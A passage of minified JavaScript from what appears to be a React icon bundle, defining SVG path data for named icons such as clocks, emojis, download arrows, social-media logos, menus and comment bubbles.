13.5a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Zm.75 3.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),category_file_documents_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M21 2.25a.75.75 0 0 1 .75.75v6.5a.75.75 0 0 1-.22.53l-1.28 1.28V18a.75.75 0 0 1-.75.75h-2.25V21a.75.75 0 0 1-.75.75H3a.75.75 0 0 1-.75-.75V5c0-.027.001-.053.004-.08A2.748 2.748 0 0 1 5 2.25h16ZM5 3.75a1.25 1.25 0 1 0 0 2.5h11.5a.75.75 0 0 1 .75.75v10.25h1.5V11c0-.199.08-.39.22-.53l1.28-1.28V3.75H5Zm5.25 10.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Zm-.75 2.25a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Z",clipRule:"evenodd"})),category_file_documents_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M22.75 19A1.75 1.75 0 0 1 21 20.75H4A2.75 2.75 0 0 1 1.25 18V6A2.75 2.75 0 0 1 4 3.25h11.172c.73 0 1.429.29 1.944.806l2.195 2.194H21c.966 0 1.75.784 1.75 1.75v11Zm-20-1c0 .69.56 1.25 1.25 1.25h.25V8c0-.966.784-1.75 1.75-1.75h11.19l-1.134-1.134a1.25 1.25 0 0 0-.884-.366H4c-.69 0-1.25.56-1.25 1.25v12Z"})),category_file_documents_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19 3.25c.966 0 1.75.784 1.75 1.75v1.25H21c.966 0 1.75.784 1.75 1.75v11A1.75 1.75 0 0 1 21 20.75H6A1.75 1.75 0 0 1 4.25 19v-.25H3A1.75 1.75 0 0 1 1.25 17V8c0-.966.784-1.75 1.75-1.75h8.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513H19Zm-3.586 1.5a.25.25 0 0 0-.177.073l-2.414 2.414a1.75 1.75 0 0 1-1.237.513H3a.25.25 0 0 0-.25.25v9c0 .138.112.25.25.25h1.25V11c0-.966.784-1.75 1.75-1.75h7.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513h1.836V5a.25.25 0 0 0-.25-.25h-3.586Z",clipRule:"evenodd"})),category_file_documents_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M8.586 3.25c.464 0 .91.185 1.237.513L11.81 5.75H18a2.75 2.75 0 0 1 2.75 2.75v1.75H22a.75.75 0 0 1 .686 1.055l-4 9a.75.75 0 0 1-.686.445H2a.75.75 0 0 1-.749-.75L1.25 5c0-.966.784-1.75 1.75-1.75h5.586ZM3 4.75a.25.25 0 0 0-.25.25v11.465l2.564-5.77.052-.096A.75.75 0 0 1 6 10.25h13.25V8.5c0-.69-.56-1.25-1.25-1.25H8a.75.75 0 0 1 0-1.5h1.69l-.927-.927a.25.25 0 0 0-.177-.073H3Z",clipRule:"evenodd"})),clock_reading_time_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25 1.25 6.063 1.25 12 6.063 22.75 12 22.75ZM11 6a1 1 0 1 1 2 0v5.382l3.447 1.723.09.051a1 1 0 0 1-.89 1.78l-.094-.041-4-2A1 1 0 0 1 11 12V6Z",clipRule:"evenodd"})),clock_reading_time_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M11 2.5V1.296A10.753 10.753 0 0 0 1.296 11H2.5a1 1 0 1 1 0 2H1.296A10.753 10.753 0 0 0 11 22.704V21.5a1 1 0 1 1 2 0v1.204A10.753 10.753 0 0 0 22.704 13H21.5a1 1 0 1 1 0-2h1.204A10.753 10.753 0 0 0 13 1.296V2.5a1 1 0 1 1-2 0Zm5.707 4.793a1 1 0 0 0-1.414 0L12 10.586l-1.793-1.793-.076-.068a1 1 0 0 0-1.338 1.482L10.586 12l-.793.793a1 1 0 1 0 1.414 1.414l.793-.793.793.793.076.068a1 1 0 0 0 1.406-1.406l-.068-.076-.793-.793 3.293-3.293a1 1 0 0 0 0-1.414Z",clipRule:"evenodd"})),clock_reading_time_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M15.5 1.25a7.25 7.25 0 0 1 7.25 7.25 7.222 7.222 0 0 1-2.001 4.997L20.75 16A6.75 6.75 0 0 1 14 22.75H2a.75.75 0 0 1-.75-.75v-7A6.75 6.75 0 0 1 8 8.25h.257a7.248 7.248 0 0 1 7.243-7Zm0 1.5a5.75 5.75 0 1 0 0 11.5 5.75 5.75 0 0 0 0-11.5ZM14 18.5a1 1 0 0 0-1-1H6a1 1 0 1 0 0 2h7a1 1 0 0 0 1-1Zm-5-5a1 1 0 1 1 0 2H6a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M14.5 5.111a1 1 0 1 1 2 0v3.3l1.485.826.087.054a1 1 0 0 1-.966 1.739l-.091-.045-2-1.111A1 1 0 0 1 14.5 9V5.11Z"})),confused_emoji_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 9a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm-5.95 8.51c.63-.68 2.871-2.237 6.317-1.617a.75.75 0 1 0 .266-1.476c-4.02-.723-6.758 1.075-7.683 2.073a.75.75 0 1 0 1.1 1.02Z",clipRule:"evenodd"})),correct_save_check_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.737 8.426a1 1 0 0 0-1.474-1.352l-4.794 5.23-1.762-1.761a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.444-.031l5.5-6Z",clipRule:"evenodd"})),correct_save_check_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M18.731 5.36a1 1 0 0 1 1.537 1.28l-10 12a1.001 1.001 0 0 1-1.475.067l-5-5a1 1 0 1 1 1.414-1.414l4.225 4.225 9.3-11.159Z"})),cross_close_x_minimize_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.707 7.293a1 1 0 0 0-1.414 1.414L10.586 12l-3.293 3.293a1 1 0 1 0 1.414 1.414L12 13.414l3.293 3.293a1 1 0 0 0 1.414-1.414L13.414 12l3.293-3.293a1 1 0 0 0-1.414-1.414L12 10.586 8.707 7.293Z",clipRule:"evenodd"})),cross_x_close_minimize_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L13.414 12l5.293 5.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L12 13.414l-5.293 5.293a1 1 0 1 1-1.414-1.414L10.586 12 5.293 6.707a1 1 0 1 1 1.414-1.414L12 10.586l5.293-5.293Z"})),desktop_monitor_computer_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M11 17.75H4A2.75 2.75 0 0 1 1.25 15V5A2.75 2.75 0 0 1 4 2.25h16A2.75 2.75 0 0 1 22.75 5v10A2.75 2.75 0 0 1 20 17.75h-7V20h3a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h3v-2.25Zm1.01-5.25a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Z",clipRule:"evenodd"})),dot_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Z",clipRule:"evenodd"})),download_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M2 19v-4a1 1 0 1 1 2 0v4c0 .548.452 1 1 1h14a1 1 0 0 0 1-1v-4a1 1 0 1 1 2 0v4a3 3 0 0 1-3 3H5c-1.652 0-3-1.348-3-3Z"}),(0,o.createElement)("path",{d:"M12 1.5a1 1 0 0 0-1 1V8H7a1 1 0 0 0-.707 1.707l5 5a1 1 0 0 0 1.414 0l5-5A1 1 0 0 0 17 8h-4V2.5a1 1 0 0 0-1-1Z"})),download_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M11.47 21.53a.75.75 0 0 0 1.06 0l2.5-2.5a.75.75 0 0 0-.53-1.28h-1.75V13a.75.75 0 0 0-1.5 0v4.75H9.5a.75.75 0 0 0-.53 1.28l2.5 2.5Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),facebook_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h6.412v-7.076H9.5V11.84h1.912v-1.22C11.412 7.462 12.84 6 15.94 6c.587 0 1.601.115 2.016.23V8.8a11.904 11.904 0 0 0-1.071-.035c-1.52 0-2.108.575-2.108 2.073v1.002h3.029l-.52 2.834h-2.51v7.076H19A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Z"})),google_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"m21.882 10.42-.103-.438h-9.485v4.036h5.667c-.588 2.81-3.318 4.289-5.549 4.289-1.623 0-3.333-.686-4.465-1.79a6.412 6.412 0 0 1-1.902-4.524c0-1.7.76-3.402 1.865-4.52 1.106-1.12 2.776-1.745 4.437-1.745 1.902 0 3.264 1.015 3.774 1.478l2.853-2.853c-.837-.74-3.136-2.603-6.72-2.603-2.764 0-5.414 1.065-7.352 3.007C2.99 6.669 2 9.434 2 12c0 2.566.937 5.193 2.79 7.12 1.98 2.056 4.784 3.13 7.671 3.13 2.627 0 5.117-1.035 6.892-2.913C21.098 17.488 22 14.93 22 12.249c0-1.129-.113-1.8-.118-1.829Z"})),growth_increase_up_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 6a1 1 0 0 1 1 1v6a1 1 0 0 1-1.706.707L18 11.414l-4.793 4.793a1 1 0 0 1-1.414 0L8.5 12.914l-4.993 4.993a1 1 0 0 1-1.414-1.414l5.7-5.7.073-.066a1 1 0 0 1 1.34.066l3.294 3.293L16.587 10l-2.293-2.293A1 1 0 0 1 15 6h6Z"})),hamicon_4_sloid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 3h18v3H3zm0 7.5h18v3H3v-3ZM3 18h18v3H3v-3Z"})),hamicon_5_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M4 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1ZM4 18a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1Zm6.5-13a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM17 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Z"})),hamicon_6_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M10 12a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0-7a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0 14a2 2 0 1 1 4 0 2 2 0 0 1-4 0Z"})),happy_emoji_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V8a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 0 1-2 0V8a1 1 0 0 1 1-1Zm-8 5.575a.675.675 0 0 0-.675.675 5.175 5.175 0 1 0 10.35 0 .675.675 0 0 0-.675-.675h-9Z",clipRule:"evenodd"})),heart_love_wishlist_favourite_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M20.433 5.288a5.797 5.797 0 0 0-8.198 0L12 5.523l-.235-.235a5.797 5.797 0 0 0-8.198 0 6.428 6.428 0 0 0 0 9.09l7.52 7.52a1.292 1.292 0 0 0 1.826 0l7.519-7.52a6.428 6.428 0 0 0 0-9.09Zm-4.169 1.285a1 1 0 1 0 0 2c.299 0 .595.114.822.341.323.323.46.76.41 1.183a1 1 0 0 0 1.986.234A3.43 3.43 0 0 0 18.5 7.5a3.156 3.156 0 0 0-2.236-.927Z",clipRule:"evenodd"})),hemicon_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h7.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hidden_hide_invisible_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19.87 3.07a.75.75 0 0 1 1.06 1.061l-16.799 16.8a.75.75 0 0 1-1.06-1.06l1.857-1.859c-1.397-1.145-2.487-2.454-3.25-3.516a20.19 20.19 0 0 1-1.255-1.985 9.52 9.52 0 0 1-.067-.127l-.025-.049a.758.758 0 0 1 0-.673l.015-.03.016-.03.016-.03.007-.014a18.243 18.243 0 0 1 .72-1.217A20.435 20.435 0 0 1 3.33 7.486c1.938-2.067 4.873-4.237 8.672-4.238 2.269 0 4.231.778 5.852 1.84L19.87 3.07ZM8.874 14.067A3.73 3.73 0 0 1 8.25 12 3.75 3.75 0 0 1 12 8.25a3.73 3.73 0 0 1 2.066.624l-5.192 5.192Zm11.657-6.405c.205.008.397.1.533.253a20.672 20.672 0 0 1 1.933 2.583 17.693 17.693 0 0 1 .661 1.138l.01.019a.77.77 0 0 1 .004.68l-.016.03-.032.06-.007.014a18.22 18.22 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.224 2.855c-1.938 2.067-4.872 4.237-8.672 4.237a9.97 9.97 0 0 1-3.243-.545.752.752 0 0 1-.277-1.25l11.5-11.082.057-.05a.753.753 0 0 1 .493-.16Z",clipRule:"evenodd"})),home_house_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75h-3.5A1.75 1.75 0 0 1 13.75 20v-5a.25.25 0 0 0-.25-.25h-3a.25.25 0 0 0-.25.25v5a1.75 1.75 0 0 1-1.75 1.75H5A2.75 2.75 0 0 1 2.25 19v-8.1c0-.786.336-1.534.923-2.056l7-6.223a2.75 2.75 0 0 1 3.654 0l7 6.223a2.75 2.75 0 0 1 .923 2.056V19Z"})),hourglass_timer_time_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M20 1.25a.75.75 0 0 1 0 1.5h-1.25v4.18c0 .92-.46 1.778-1.225 2.288L13.352 12l4.173 2.782a2.75 2.75 0 0 1 1.225 2.288v4.18H20a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1 0-1.5h1.25v-4.18c0-.92.46-1.778 1.225-2.288L10.648 12 6.475 9.218A2.75 2.75 0 0 1 5.25 6.93V2.75H4a.75.75 0 0 1 0-1.5h16ZM13.75 16.5a.75.75 0 0 0-.75-.75h-2a.75.75 0 0 0 0 1.5h2a.75.75 0 0 0 .75-.75Zm.75 2.25a.75.75 0 0 1 0 1.5h-5a.75.75 0 0 1 0-1.5h5Z",clipRule:"evenodd"})),instagram_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M9 12a3 3 0 1 1 6 0 3 3 0 0 1-6 0Z"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm12.5 5.5a1.25 1.25 0 1 0 0-2.5 1.25 1.25 0 0 0 0 2.5ZM12 7a5 5 0 1 0 0 10 5 5 0 0 0 0-10Z",clipRule:"evenodd"})),laptop_computer_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M2.75 15.25V6A2.75 2.75 0 0 1 5.5 3.25h13A2.75 2.75 0 0 1 21.25 6v9.25H2.75ZM13.5 6a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3ZM1.25 18v-1.25h21.5V18A2.75 2.75 0 0 1 20 20.75H4A2.75 2.75 0 0 1 1.25 18Z",clipRule:"evenodd"})),left_align_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18ZM11 20a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h8Zm10-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18ZM11 8a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h8Z"})),left_triangle_angle_arrow_backward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17.75 19c0 1.442-1.646 2.265-2.8 1.4l-9.333-7a1.75 1.75 0 0 1 0-2.8l9.333-7c1.154-.865 2.8-.042 2.8 1.4v14Z"})),linkedin_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm11.15 16.792h2.893v-5.945c0-2.515-1.425-3.731-3.417-3.731-1.992 0-2.83 1.552-2.83 1.552V9.652h-2.79v9.389h2.79v-4.929c0-1.32.607-2.106 1.77-2.106 1.07 0 1.584.755 1.584 2.106v4.929ZM4.96 6.69c0 .957.77 1.732 1.72 1.732s1.719-.775 1.719-1.732-.77-1.733-1.72-1.733S4.96 5.733 4.96 6.69Zm3.188 12.35H5.24V9.654h2.908v9.389Z",clipRule:"evenodd"})),link_chains_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M6.264 9.281a1 1 0 0 1 1.415 1.415L5.165 13.21a3.977 3.977 0 1 0 5.625 5.625l2.514-2.514a1 1 0 0 1 1.415 1.414l-2.515 2.514a5.977 5.977 0 1 1-8.453-8.453L6.264 9.28Zm5.532-5.53a5.977 5.977 0 1 1 8.453 8.453l-2.514 2.515a1 1 0 0 1-1.414-1.415l2.514-2.514a3.977 3.977 0 1 0-5.625-5.625l-2.514 2.514a1.001 1.001 0 0 1-1.415-1.414l2.515-2.514Z"}),(0,o.createElement)("path",{d:"M13.793 8.793a1 1 0 1 1 1.414 1.414l-5 5a1 1 0 0 1-1.414-1.414l5-5Z"})),location_gps_map_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.625 22.65 12 22l.375.65a.75.75 0 0 1-.75 0Z"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M11.625 22.65 12 22c.375.65.376.649.376.649l.002-.001.006-.004.02-.012.034-.02.04-.024a19.765 19.765 0 0 0 1.212-.814 22.44 22.44 0 0 0 2.847-2.456c2.058-2.11 4.213-5.239 4.213-9.113 0-4.928-3.9-8.955-8.75-8.955s-8.75 4.027-8.75 8.955c0 3.874 2.155 7.002 4.213 9.113a22.436 22.436 0 0 0 3.788 3.101 12.961 12.961 0 0 0 .344.213l.021.012.006.004.003.001ZM12 6.25a3.75 3.75 0 1 0 0 7.5 3.75 3.75 0 0 0 0-7.5Z",clipRule:"evenodd"})),long_arrow_up_top_increase_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11 21V10H6a1 1 0 0 1-.707-1.707l6-6 .076-.068a1 1 0 0 1 1.338.068l6 6A1 1 0 0 1 18 10h-5v11a1 1 0 1 1-2 0Z"})),mail_email_messege_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v12A2.75 2.75 0 0 0 4 20.75h16A2.75 2.75 0 0 0 22.75 18V6A2.75 2.75 0 0 0 20 3.25H4ZM6.6 7.2a1 1 0 1 0-1.2 1.6l4.8 3.6a3 3 0 0 0 3.6 0l4.8-3.6a1 1 0 0 0-1.2-1.6l-4.8 3.6a1 1 0 0 1-1.2 0L6.6 7.2Z",clipRule:"evenodd"})),media_document_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M2.25 19V5A2.75 2.75 0 0 1 5 2.25h10.172c.73 0 1.429.29 1.944.806l3.828 3.828a2.75 2.75 0 0 1 .806 1.944V19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19ZM15 15.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2-7a1 1 0 0 0-1-1H8a1 1 0 0 0 0 2h4a1 1 0 0 0 1-1Zm4 3.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h8a1 1 0 0 0 1-1Z"})),messege_comment_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M22.75 16A2.75 2.75 0 0 1 20 18.75H7.264l-4.795 3.836A.75.75 0 0 1 1.25 22V7A2.75 2.75 0 0 1 4 4.25h16A2.75 2.75 0 0 1 22.75 7v9ZM14 9.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9ZM14 8.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v9A2.75 2.75 0 0 0 4 17.75h3.75V21a.75.75 0 0 0 1.219.586l4.794-3.836H20A2.75 